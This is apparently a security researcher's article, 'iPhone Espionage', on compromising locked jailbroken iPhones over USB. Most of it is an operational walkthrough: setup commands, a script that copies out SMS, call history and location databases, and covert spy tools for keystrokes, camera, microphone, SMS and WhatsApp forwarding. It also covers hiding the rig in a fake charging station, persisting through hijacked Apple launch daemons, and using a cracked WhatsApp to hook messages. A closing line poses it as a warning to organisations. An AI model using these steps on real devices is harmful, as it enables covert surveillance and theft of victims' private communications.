iPhone Espionage

There is this misconception that iPhones are protected by the iPhone passcode. This is true for non jailbroken iPhones but no so for jailbroken ones. It is possible to have root access to the iPhone file system using tools from libimobiledevice.org even when the locked jailbroken iPhone is protected by the PIN. This seems to be related to the way lockdownd works after an iPhone is jailbroken. This seems to be around since the iPhone 3GS days based on this slashdot.org article that was published in May 2010. iPhones PINBased Security Transparent to Ubuntu http://apple.slashdot.org/story/10/05/27/1826207/iphones-pin-basedsecurity-transparent-to-ubuntu. All the attacker need is to have 3 seconds with your phone and then connect the iPhone to the usb cable. It could take lesser than 3 seconds depending on the speed of the computer as well as whether the attack is staged. This would seem like an awesome attack vector but is only viable to carry out if you have physical contact with the iPhone or with perform some social engineer to get the victim to connect the iPhone to an embedded device (e.g. mobile charger) ? Having root access to the iPhone file system means that the attacker is able to view and extract confidential data from your iPhone like emails, SMS, photos, basically everything on your iPhone including cookies. We are faced with an issue. How do we get our spy tools and binaries to run on the iPhone system during startup ? Typically, to register an executable so that it can run at startup, you will have to run the command launchctl load /System/Library/LaunchDaemons/com.apple.system.plist However, since we do not have command line access to the system, we would not be able to use this method. We need to find an alternative solution to get our binaries to run at iPhone startup in the background.

Proof of Concept Spy Tools

There are a couple of proof of concept tools that I have made with the help of examples that I found on the internet which could be used as baseline to be modified for espionage use. The source code and binaries of the tools can be found at https://github.com/milo2012/iPhone-Espionage

Tool Name
kbhook2 location1 sms1 takePicture screenCapture mic1 whatsapp1 demoScreenCapture1

Purpose
Captures key strokes from the iPhone keyboard and save to a text file. Captures GPS coordinates in the background. Captures incoming SMS and forwards it another mobile number. Activates the iPhone front camera in the background and takes a photo and save it in /tmp folder. Takes a screenshot of the current iPhone screen so that we can monitor that the user is doing. Activates the iPhone microphone and record a 30 second clip. Intercepts WhatsApp incoming and outgoing messages and forwards it to an email address. Demo program which shows that the screenCapture tool can be automated to take each and every screen of a particular iPhone application. When coupled with kbhook2, it is possible get screenshots of the emails in enterprise email iPhone application which provides data encryption and security which the user is browsing thru his/her emails.

Shrinking the Platform

However, it would attract too much attention if we were to connect the targets iPhone to a computer and run the script. However, we could avoid reduce suspicion by shrinking the whole attack environment to the size of your palm. There are a couple of hardware devices which are small and supports Linux or in particular Debian. A few devices which are of interest includes the Raspberry Pi, Beagleboard, Nokia N900 and the Openmoko Freerunner. Alternatively, you can conceal it in the form of a USB charger or mobile charging stations. Brian Markus and Joseph did a demo on this in Defcon Las Vegas 2011. A writeup can be found here http:// krebsonsecurity.com/2011/08/beware-of-juice-jacking/

A mobile charging station found in Bangkok, Thailand

Summary of Steps
Below is a summary of what you need to do 1. 2. 3. 4. 5. 6. 7. Install Debian/Ubuntu on the embedded device. Install the prequisities using the script setupPrerequisities.sh from https://github.com/milo2012/iPhoneEspionage/tree/master/evil_gf_attack Download and copy scanUSB.sh from https://github.com/milo2012/iPhone-Espionage/tree/master/ evil_gf_attack onto /tmp1/ on your embedded device Modify scanUSB.sh Run the command update-rc.d -f /tmp1/scanUSB.sh start 99 2 3 4 5 Now, reboot the device and plug in your iPhone via the iPhone usb cable. Wait for the magic to happen.

Installing the Prerequisites

You will need to install the below requisities on a Debian/Ubuntu system. Alternatively, you can download the script from https://github.com/milo2012/iPhone-Espionage/raw/master/evil_gf_attack/setupPrerequisites.sh and save yourself some trouble. apt-get install libusb-dev usbmuxd libimobiledevice-dev libplist-dev libgnutls-dev build-essential libgnutlsdev libxml2-dev libreadline5-dev libgcrypt-dev libglib2.0-dev libplist-dev libusbmuxd-dev usbmuxd make automake autoconf libtool gcc python-dev git libfuse-dev libimobiledevice-utils ibgtk2.0-dev libnautilusextension-dev intltool libzip-dev -y mkdir /tmp1 && cd /tmp1 && git clone https://github.com/mcolyer/libiphone.git /tmp1/libiphone/autogen.sh && /tmp1/libiphone/configure && /tmp1/libiphone/make && /tmp1/libiphone/ make install git clone https://github.com/mcolyer/ifuse.git /tmp1/ifuse/autogen.sh && /tmp1/ifuse/configure -prefix=/ && /tmp1/ifuse/make && /tmp1/ifuse/make install wget http://www.libimobiledevice.org/downloads/ideviceinstaller-1.0.0.tar.bz2 bunzip2 -d ideviceinstaller-1.0.0.tar.bz2 && tar xvf ideviceinstaller-1.0.0.tar && /tmp1/ideviceinstaller-1.0.0/ configure && /tmp1/ideviceinstaller-1.0.0/make && /tmp1/ideviceinstaller-1.0.0/make install

Modifying the Script

The main tool that does the magic is iFuse. iFuse takes care of mounting the the root iPhone filesystem in Linux. The command that does the trick is ifuse $mountPath --root. I have written a script which when run, monitors usb connections looking for an Apple device. When an Apple device is connected, it will mount the root iPhone filesystem and then copies out predetermined databases like Google Maps cached information, iPhone call history, SMS data, Cell Tower location database. The script also extract device related information and the list of installed applications on the Iphone in a matter of seconds. You can also uncomment some lines in the script to copy some spy tools to the iPhone and also execute them either at startup or at specific timing of the day.

The script can be found at https://github.com/milo2012/iPhone-Espionage/blob/master/evil_gf_attack/ scanUSB.sh If you are looking at hooking directly to the functions of iPhone applications like what I did with WhatsApp, you will be looking at something called an iPhone tweak and you would need to copy the binary to /tmp1/ TransferDynLibraries so that it will be copied over to /Library/MobileSubstrate/DynamicLibraries when the scanUSB.sh scripts detect an iPhone being connected. If you are looking at running something in the background of the iPhone at all times or during specific timing, you will be looking at something called an iPhone tool. You will need to copy the binary to /tmp1/ TransferStartup so that it will be copied over to /usr/bin on the iPhone when the script is running..

iPhone Daemons
Daemons are system processes that run in the background of the system. These system processes are started when the iPhone boots up. If we want to run our spytool at startup or at certain intervals of the day, we would need to identify the plist of an abundent daemon to overwrite. There are a list of abundent daemons that have already been registered on the iPhone by Apple which seems fairly safe to delete or replace in our case to run our own malicious binaries. The list of safe to delete/replicate daemons included but not limited to are com.apple.iqagent.plist com.apple.mobile.profile_janitor.plist com.apple.chud.chum.plist com.apple.DumpPanic.plist com.apple.ReportCrash.(*).plist com.apple.CrashHouseKeeping.plist com.apple.aslmanager.plist com.apple.syslogd.plist com.apple.powerlog.plist com.apple.stackshot.server.plist com.apple.chud.pilotfish.plist By hiding and replacing the existing plist files makes it slightly more undetectable. Normal users do not check the contents of the LaunchDaemons.

Modifying the Launch Daemons

The plist file for LaunchDaemon have 3 types of launch options 1. 2. 3. Run at Load Run at Load and Launch Only Once Start At Certain Interval

In order to be hide below the radars, I would choose the 3rd option as option 1 and 2 would slow down the iPhone significantly during startup. Below are the contents of an original com.apple.CrashHousekeeping.plist.

Below are the contents of a modified com.apple.CrashHousekeeping.plist which calls our malicious binary /usr/ bin/sql2. I have specified it to the daemon to run daily at 4.01am.

Developing an iPhone Tweak

In the below example, I will show how easy it is to develop an iPhone tweak which intercepts the incoming and outgoing messages in WhatsApp. Most iPhone applications have enabled debug mode in the application so that users can report bugs to the software company.

You will need to connect your iPhone to your Mac and start Xcode and then launch Organizer. The debug messages are very invaluable to us as it tells us which class and method to hook. This has made our development work even easier. THEOS is a very useful tool made by Dustin L. Howett and it makes jailbroken iPhone development so much easier as compare to using Xcode. The installation guide for THEOS can be found here http:// iphonedevwiki.net/index.php/Theos/Getting_Started

You will need the below 1. 2. 3. 4. 5. 6. Mac with Snow Leopard or Lion with Xcode Jailbroken iPhone THEOS Crackulous from Cydia WhatsApp Class-Dump (http://www.codethecode.com/projects/class-dump/)

What you need to do ?

1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. Install THEOS Run Crackulous on iPhone and select Whatsapp SCP the cracked version of Whatsapp from your iPhone to your Mac. It should be stored in /private/var/ root/Documents/Cracked/ folder on your iPhone Unzip the decrypted ipa file Navigate to Payload > WhatsApp.app Open Info.plist. Take note of the Bundle Identifier mkdir /Headers Run Class-Dump -H WhatsApp -o Headers/ Under XMPPConnection.h you should see a method called processIncomingMessages:(id)arg1 After installation of THEOS, you will navigate /opt/theos/bin Run sudo ./nic.pl

13. 14. 15.

Select Option 5 for Tweak Key in a project name cd <ProjectName>

16.

Edit Tweak.xm and fill in the below details

17.

What the code does is to hook the method processIncomingMessages:(id)arg1 method in XMPPConnection class. The %log command logs information about the call , methods, names and arguments to the system log. The %orig command makes a call to the original function with the original arguments. Edit <projectname.plist> and overwrite the data and replace it with the below information.

18.

19. 20. 21.

Run make Go to obj folder and copy <projectname.dylib> to /Library/MobileSubstrate/DynamicLibraries on your iPhone. Alternatively you can run export THEOS_DEVICE_IP=XX.XX.XX.XX and run make package && make install to install the dylib to your iPhone via SSH.

Conclusion
Are you allowing jailbroken iPhone devices in your organization? How are you managing these mobile devices and are you able to ensure the integrity of these devices and that they have not been compromised ? The author of this article can be contacted at keith.lee2012[at]gmail.com, via twitter @keith55 or via his blog at http://milo2012.wordpress.com